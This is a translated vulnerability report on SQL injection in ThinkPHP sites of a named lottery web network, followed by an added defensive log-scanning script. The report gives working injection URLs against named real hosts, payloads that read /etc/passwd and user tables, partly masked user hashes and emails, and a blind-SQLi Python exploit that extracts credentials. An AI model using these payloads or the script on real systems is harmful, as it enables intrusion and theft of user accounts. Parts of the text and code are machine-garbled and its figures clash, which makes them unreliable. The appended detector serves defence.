Happy web SQL Injection Vulnerability
Many websites of Happy color network are built on the ThinkPHP framework. Because patches were not applied in time, SQL injection is widespread across them. See 2cto: SQL Injection.
Injection 1: in the ThinkPHP framework architecture:
Http://lebi.17500.cn/Experts/Search/index/lotid/3d.html? Ename [0] = exp & ename [1] = and (select (0) from (select/**/sleep (1) v)
Corresponding development and test sites:
Http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html? Ename [0] = exp & ename [1] = and % 20 updatexml (1, concat (0x7c, user (), 0x7c, version (), 1)
load_file:
Http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html? Ename [0] = exp & ename [1] = and % 20 updatexml (1, concat (0x7c, load_file (% 27/etc/passwd % 27), 1)
Injection 2: passport site
Https://passport.17500.cn/message/system/sitefrom/1.html? Isread [0] = exp & isread [1] = and % 200% 20or % 201% 20 limit % 2023% 23
Https://passport.17500.cn/message/system.html? Msgid = 56
There are many more...
120 million user data:
Select (count (*) from uc. uc_memory: 1229581
Select (group_concat (uid, 0x3a, username, 0x3a, password, 0x3a, email, 0x7c) from uc. uc_members where uid in (2, 4 ):
Eren: d6694 ************** 39c9f06742cc8: doubutou@17500.cn: 134424
Pawn: e1cac8ddd3 *************** 33aa15f: dao@17500.cn: 907316
Test Script: (replace the cookie in the script)
# Coding = UTF-8 ''' databases: information_schema, bbslog, cnlot2004, lottery, mysql, newlebi, cece_schema, test, uc, ucbak, uprofile ''' import sys, url2libimport threadingfrom multiprocessing. dummy import Poolfrom multiprocessing. dummy import Lockfrom optparse import OptionParserfrom urllib2 import Request, urlopen, URLError, HTTPErrorimport urllibdef request (URL): user_agent = {'user-agent': 'mozilla/5.0 (Macintosh; intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 '} req = urllib2.Request (URL, None, user_agent) req. add_header ('cookie ', 'phpsessid = 7dsnoj0rejlv4m9dg90ures6j1') # Cookie try: request = urllib2.urlopen (req) Login T Exception: return ''return request. read () def binary_sqli (left, right, index): global result while 1: mid = (left + right)/2 if mid = left: lock. acquire () result [index-1] = chr (mid) sys. stdout. write ('\ r % s' % 'data:' + ''. join (result ). strip ('*') sys. stdout. flush () lock. release () break payload = "(ascii (substring (select (group_concat (uid, 0x3a, username, 0x3a, password, 0x3a, email, 0x7c) from uc. uc_members where uid in (2, 4), % s, 1) % s = ascii (substring (select (group_concat (uid, 0x3a, username, 0x3a, password, 0x3a, email, 0x7c) from uc. uc_members where uid in (2, 4), % s, 1) limit 2 # "% (index, mid, index) html = request (' https://passport.17500.cn/message/system/sitefrom/1.html?isread [0] = exp & isread [1] =-1 + or '+ urllib. quote (payload) verify = '2017-03-17 01:57:21 'if verify in html: right = mid else: left = middef multi_run_wrapper (args): return binary_sqli (* args) if _ name _ = '_ main _': result = list ('* 100) lock = Lock () args = [] for I in range (0, 1,100): args. append (32,127, I) pool = Pool (10) out = pool. map (multi_run_wrapper, args) pool. close () pool. join () output = open('result.txt ', 'w') output. write (''. join (result) output. close ()
Solution: Upgrade ThinkPHP and deploy a WAF, a reliable one.
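While the upgrade is rolled out, the request shape seen in both injections above (a parameter sent as an array whose element 0 is `exp` and whose element 1 carries an expression) can be hunted for in web access logs. The following is an added example, not part of the original report; the combined-log line format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches array-style parameter names such as ename[0] or isread[1].
ARRAY_KEY = re.compile(r"^\s*(?P<name>[^\[\]\s]+)\s*\[\s*(?P<idx>\d+)\s*\]\s*$")

def exp_array_params(url):
    """Return names of parameters sent as name[0]=exp together with a name[1] value."""
    elems = {}
    # parse_qsl percent-decodes keys, so ename%5B0%5D and ename[0] are treated alike.
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        m = ARRAY_KEY.match(key)
        if m:
            elems.setdefault(m.group("name").lower(), {})[int(m.group("idx"))] = value
    return sorted(
        name for name, items in elems.items()
        if items.get(0, "").strip().lower() == "exp" and 1 in items
    )

def scan(log_lines):
    """Yield (client_ip, path, flagged_params) for each suspicious request.

    Assumed line format: ip - - [time] "METHOD url PROTO" status size
    Only the query string is inspected; POST bodies are not present in access logs.
    """
    request = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<url>\S+) [^"]*"')
    for line in log_lines:
        m = request.match(line)
        if not m:
            continue
        flagged = exp_array_params(m.group("url"))
        if flagged:
            yield m.group("ip"), urlsplit(m.group("url")).path, flagged

# Constructed sample log lines (documentation IP ranges, placeholder expressions).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Mar/2017:01:50:11 +0800] "GET /Experts/Search/index/lotid/3d.html?ename=zhang HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Mar/2017:01:58:02 +0800] "GET /Experts/Search/index/lotid/3d.html?ename%5B0%5D=EXP&ename%5B1%5D=PLACEHOLDER_EXPRESSION HTTP/1.1" 200 312',
    '203.0.113.9 - - [17/Mar/2017:01:58:05 +0800] "GET /message/system/sitefrom/1.html?isread[0]=exp&isread[1]=PLACEHOLDER_EXPRESSION HTTP/1.1" 200 298',
    '198.51.100.4 - - [17/Mar/2017:01:59:40 +0800] "GET /message/system.html?tags[0]=news&tags[1]=exp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, path, params in scan(SAMPLE_LOG):
        print(ip, path, params)
```

The same predicate can back a request filter in front of the application: no legitimate form on these pages needs to submit `exp` as element 0 of an array parameter, so a match is a strong signal rather than a heuristic.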